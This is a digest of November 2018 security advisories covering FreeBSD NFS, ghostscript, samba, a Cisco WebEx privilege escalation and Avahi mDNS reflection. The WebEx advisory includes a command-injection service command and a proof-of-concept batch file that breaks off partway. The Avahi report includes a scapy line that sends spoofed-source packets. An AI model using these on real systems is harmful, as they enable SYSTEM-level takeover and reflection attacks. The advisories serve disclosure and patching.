FreeBSD Security Advisory FreeBSD-SA-18:13.nfs
=============================================================================
FreeBSD-SA-18:13.nfs                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Multiple vulnerabilities in NFS server code

Category:       core
Module:         nfs
Announced:      2018-11-27
Credits:        Jakub Jirasek, Secunia Research at Flexera
Affects:        All supported versions of FreeBSD.
Corrected:      2018-11-23 20:41:54 UTC (stable/11, 11.2-STABLE)
                2018-11-27 19:42:16 UTC (releng/11.2, 11.2-RELEASE-p5)
CVE Name:       CVE-2018-17157, CVE-2018-17158, CVE-2018-17159

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The Network File System (NFS) allows a host to export some or all of its
file systems so that other hosts can access them over the network and
mount them as if they were local. FreeBSD includes both server and client
implementations of NFS.

II.  Problem Description

Insufficient and improper checking in the NFS server code could cause a
denial of service or possibly remote code execution via a specially
crafted network packet.

III. Impact

A remote attacker could cause the NFS server to crash, resulting in a
denial of service, or possibly execute arbitrary code on the server.

IV.  Workaround

No workaround is available, but systems that do not provide NFS services
are not vulnerable. Additionally, it is highly recommended that the NFS
service port (default port number 2049) is protected via a host or
network based firewall to prevent arbitrary, untrusted clients from being
able to connect.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch.asc
# gpg --verify nfs.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/11/                                                        r340854
releng/11.2/                                                      r341088
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://www.flexerasoftware.com/enterprise/company/about/secunia-research/>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-18:13.nfs.asc>
[SECURITY] [DSA 4346-1] ghostscript security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-4346-1                   secur...@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
November 27, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ghostscript
CVE ID         : CVE-2018-19409 CVE-2018-19475 CVE-2018-19476 CVE-2018-19477

Several vulnerabilities were discovered in Ghostscript, the GPL
PostScript/PDF interpreter, which may result in denial of service or the
execution of arbitrary code if a malformed Postscript file is processed
(despite the -dSAFER sandbox being enabled).

This update rebases ghostscript for stretch to the upstream version 9.26
which includes additional changes.

For the stable distribution (stretch), these problems have been fixed in
version 9.26~dfsg-0+deb9u1.

We recommend that you upgrade your ghostscript packages.

For the detailed security status of ghostscript please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/ghostscript

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[CORE-2018-0011] - Cisco WebEx Meetings Elevation of Privilege Vulnerability
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability

1. Advisory Information

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability
Advisory ID: CORE-2018-0011
Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability
Date published: 2018-11-27
Date of last update: 2018-11-27
Vendors contacted: Cisco
Release mode: Coordinated release

2. Vulnerability Information

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-15442

3. Vulnerability Description

Cisco's Webex Meetings website states that [1]:

"Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings. With Cisco Webex Meetings, joining is a breeze, audio and video
are clear, and screen sharing is easier than ever. We help you forget
about the technology, to focus on what matters."

A vulnerability in the update service of Cisco Webex Meetings Desktop App
for Windows could allow a local attacker to elevate privileges. This
vulnerability is related to a previous security issue fixed by Cisco in
October.

4. Vulnerable Packages

. Cisco Webex Meetings Desktop App releases prior to 33.6.4
. Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6

5. Vendor Information, Solutions and Workarounds

Cisco released a new fixed version and updated its security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection

6. Credits

This vulnerability was discovered and researched by Marcos Accossatto from
SecureAuth Exploits' Writers Team. The publication of this advisory was
coordinated by Leandro Cuozzo from SecureAuth Advisories Team.

7. Technical Description / Proof of Concept Code

7.1. Privilege Escalation [CVE-2018-15442]

The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate user-supplied parameters. An unprivileged local
attacker could exploit this vulnerability by invoking the update service
command with a crafted argument. This will allow the attacker to run
arbitrary commands with SYSTEM user privileges.

The vulnerability can be exploited by copying the ptUpdate.exe binary to a
local attacker-controlled folder. Also, a malicious DLL named wbxtrace.dll
must be placed in the same folder. To gain privileges, the attacker must
start the service with the command line:

    sc start webexservice install software-update 1 "attacker-controlled-path"

(if the parameter 1 doesn't work, then 2 should be used)

Proof of Concept:

/-----------
REM Contents of PoC.bat
REM This batch will copy the ptUpdate.exe from the installation folder to the current folder
REM Then it will generate a simple dll that will execute notepad.exe on load. The dll will be created using certutil.exe and named wbxtrace.dll
REM Finally, the webexservice service will be started, with the shown parameters
REM The result should be a notepad.exe with SYSTEM user privileges

@echo off

:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END

:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END

:END
Avahi 0.7 missing link-local checks in Legacy Unicast Responses cause information disclosure and makes DDoS with mDNS traffic reflection possible
Hi!

Avahi-daemon in Avahi through 0.7 inadvertently sends Legacy Unicast
Responses to IPv4 unicast queries with source addresses that are not
link-local, which allows remote attackers to cause a denial of service
(traffic amplification) or obtain potentially sensitive information via
port-5353 UDP packets.

    send(IP(src="1.1.1.1",dst="192.168.1.1")/UDP(sport=53, dport=5353)/DNS(rd=1,qd=DNSQR(qtype="PTR", qname="_ssh._tcp.local."))))

Author was notified by his bug tracker:
https://github.com/lathiat/avahi/issues/203

Regards,
-- 
Krzysztof Burghardt
http://www.burghardt.pl/
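The missing check the report describes, as an added example that is not part of the original post or of Avahi's code: a Python policy function that answers a Legacy Unicast query (source port other than 5353) only when the querier's address is on a local link, plus an audit over constructed query records to count how many such queries an unpatched responder would have reflected off-link. The subnet 192.168.1.0/24 and all addresses and ports other than the report's 1.1.1.1 / 192.168.1.1 / 53 / 5353 are constructed assumptions.

```python
"""On-link check an mDNS responder needs before answering a Legacy Unicast
query, which the report above says Avahi <= 0.7 lacked. Added illustration,
not Avahi's code; the subnet and the query values are constructed."""
import ipaddress
from dataclasses import dataclass

MDNS_PORT = 5353

@dataclass(frozen=True)
class Query:
    src: str    # querier IP from the IP header (spoofable)
    sport: int  # querier UDP source port
    dport: int  # 5353 for mDNS

def on_local_link(addr: str, local_nets) -> bool:
    """True if addr is link-local or inside one of this host's subnets."""
    ip = ipaddress.ip_address(addr)
    if ip.is_link_local:  # 169.254.0.0/16 or fe80::/10
        return True
    return any(ip in ipaddress.ip_network(n) for n in local_nets)

def classify(q: Query, local_nets) -> str:
    """Return 'multicast', 'unicast' or 'drop'. Source port 5353 is ordinary
    mDNS answered to the multicast group, so the source address is moot. Any
    other source port marks a Legacy Unicast query (RFC 6762, 6.7), answered
    straight to q.src: off-link, that makes this host a reflector, so drop."""
    if q.dport != MDNS_PORT:
        return "drop"
    if q.sport == MDNS_PORT:
        return "multicast"
    return "unicast" if on_local_link(q.src, local_nets) else "drop"

def audit(queries, local_nets) -> int:
    """Legacy unicast queries an unpatched responder would answer off-link,
    i.e. the reflection exposure present in a captured sample."""
    return sum(1 for q in queries if q.dport == MDNS_PORT
               and q.sport != MDNS_PORT and not on_local_link(q.src, local_nets))

LOCAL_NETS = ["192.168.1.0/24"]  # constructed: the responder's LAN
SAMPLE = [  # constructed; the first mirrors the report's scapy packet
    Query("1.1.1.1", 53, 5353),          # spoofed source, off-link
    Query("192.168.1.50", 49152, 5353),  # on-link legacy unicast
    Query("192.168.1.77", 5353, 5353),   # ordinary multicast mDNS
    Query("169.254.10.9", 40000, 5353),  # IPv4 link-local source
]

if __name__ == "__main__":
    for q in SAMPLE:
        print(f"{q.src}:{q.sport} -> {classify(q, LOCAL_NETS)}")
    print("off-link legacy unicast queries:", audit(SAMPLE, LOCAL_NETS))
```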
[SECURITY] [DSA 4345-1] samba security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-4345-1                   secur...@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
November 27, 2018                     https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : samba
CVE ID         : CVE-2018-14629 CVE-2018-16841 CVE-2018-16851

Several vulnerabilities have been discovered in Samba, a SMB/CIFS file,
print, and login server for Unix. The Common Vulnerabilities and
Exposures project identifies the following issues:

CVE-2018-14629

    Florian Stuelpner discovered that Samba is vulnerable to infinite
    query recursion caused by CNAME loops, resulting in denial of
    service.

    https://www.samba.org/samba/security/CVE-2018-14629.html

CVE-2018-16841

    Alex MacCuish discovered that a user with a valid certificate or
    smart card can crash the Samba AD DC's KDC when configured to accept
    smart-card authentication.

    https://www.samba.org/samba/security/CVE-2018-16841.html

CVE-2018-16851

    Garming Sam of the Samba Team and Catalyst discovered a NULL pointer
    dereference vulnerability in the Samba AD DC LDAP server allowing a
    user able to read more than 256MB of LDAP entries to crash the Samba
    AD DC's LDAP server.

    https://www.samba.org/samba/security/CVE-2018-16851.html

For the stable distribution (stretch), these problems have been fixed in
version 2:4.5.12+dfsg-2+deb9u4.

We recommend that you upgrade your samba packages.

For the detailed security status of samba please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/samba

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org